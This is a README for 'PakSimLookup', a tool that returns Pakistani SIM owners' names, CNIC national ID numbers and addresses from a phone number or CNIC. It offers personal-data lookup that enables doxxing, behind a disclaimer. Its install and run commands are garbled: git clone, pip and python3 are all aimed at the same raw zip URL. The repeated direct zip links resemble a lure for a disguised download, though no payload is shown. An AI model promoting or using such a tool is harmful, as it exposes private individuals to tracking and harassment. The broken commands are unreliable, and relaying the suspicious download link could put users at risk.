PakSimLookup is a Python-based tool designed to extract information using either a mobile number (starting with 0) or a CNIC (without dashes). It provides details such as π± Mobile Number, π·οΈ Name, π CNIC, and π Address. This tool is intended to assist in identifying individuals and addressing abusive behavior or misconduct.
The author of this tool is not responsible for any misuse or illegal activities carried out using this tool. It is solely the responsibility of the user to ensure compliance with local laws and regulations. This tool is intended for ethical use only.
- π Fetch details using a mobile number (must start with 0 and be 11 digits long).
- π Fetch details using a CNIC (without dashes and exactly 13 digits long).
- πΎ Provides Information of SIM Owners Registered in or Before 2020.
- π Python 3.x
- Clone the repository:
git clone https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip
- Navigate to the toolβs directory:
cd PakSimLookup - Install dependencies:
pip install -r https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip
Run the following commands from your terminal:
python3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --helppython3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --number 03001234567python3 https://raw.githubusercontent.com/mwaseemsarwar/PakSimLookup/main/thisness/PakSimLookup.zip --cnic 1234512345671PakSimLookup is provided "as is" without any guarantees or warranties. Users are strictly prohibited from using this tool for illegal activities, including but not limited to unauthorized access to private information. By using this tool, you agree to take full responsibility for your actions.
π Contributions are welcome! Feel free to fork the repository and submit pull requests.